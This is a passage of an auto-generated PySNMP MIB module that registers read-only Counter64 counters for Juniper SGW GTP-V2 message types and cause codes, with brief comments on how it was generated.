if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
jnxMbgSgwDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
jnxMbgSgwDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
# --- Auto-generated PySNMP MIB objects (compiled from a Juniper SGW MIB). ---
# Each statement below registers one read-only Counter64 column of the SGW
# GTP-V2 per-message / per-cause statistics table, under the OID prefix
# 1.3.6.1.4.1.2636.3.66.2.2.1.2.1.<subId> (subIds 84..188 in this chunk).
# The pattern is uniform throughout: create the column, then — only when the
# MIB builder was configured to load DESCRIPTION/STATUS texts — attach them.
# Do not hand-edit individual entries; regenerate from the MIB source instead.
# NOTE(review): spellings such as 'Symantic' and 'Indicaton' in the strings
# below are carried over verbatim from the original MIB DESCRIPTION clauses;
# they are runtime string literals and are intentionally left untouched.
jnxMbgSgwDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 84), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
# The next Rx/Tx pair is marked 'obsolete' in the MIB (kept for OID stability).
jnxMbgSgwGtpV2ICsPageRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageRx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageRx.setDescription('Number of GTPV2 packets received with cause Page.')
jnxMbgSgwGtpV2ICsPageTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageTx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPageTx.setDescription('Number of GTP packets sent with cause Page.')
# GTP-V2 initial-message cause-code counters: one Rx/Tx Counter64 pair per
# 3GPP TS 29.274 cause value, registered at consecutive subIds.
jnxMbgSgwGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference')
jnxMbgSgwGtpV2ICsNewPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwGtpV2ICsNewPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNewPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenRx.setDescription('Number of GTPV2 packets received with cause Invalid Length.')
jnxMbgSgwGtpV2ICsInvLenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 106), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsInvLenTx.setDescription('Number of GTP packets sent with cause Invalid Length.')
jnxMbgSgwGtpV2ICsServNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 107), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppRx.setDescription('Number of GTPV2 packets received with cause Service Not supported.')
jnxMbgSgwGtpV2ICsServNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 108), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServNotSuppTx.setDescription('Number of GTP packets sent with cause Service Not supported.')
jnxMbgSgwGtpV2ICsManIEIncorrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 109), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE incorrect.')
jnxMbgSgwGtpV2ICsManIEIncorrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 110), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEIncorrTx.setDescription('Number of GTP packets sent with cause Mandatory IE incorrect.')
jnxMbgSgwGtpV2ICsManIEMissRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 111), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissRx.setDescription('Number of GTPV2 packets received with cause Mandatory IE Missing.')
jnxMbgSgwGtpV2ICsManIEMissTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 112), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsManIEMissTx.setDescription('Number of GTP packets sent with cause Mandatory IE Missing.')
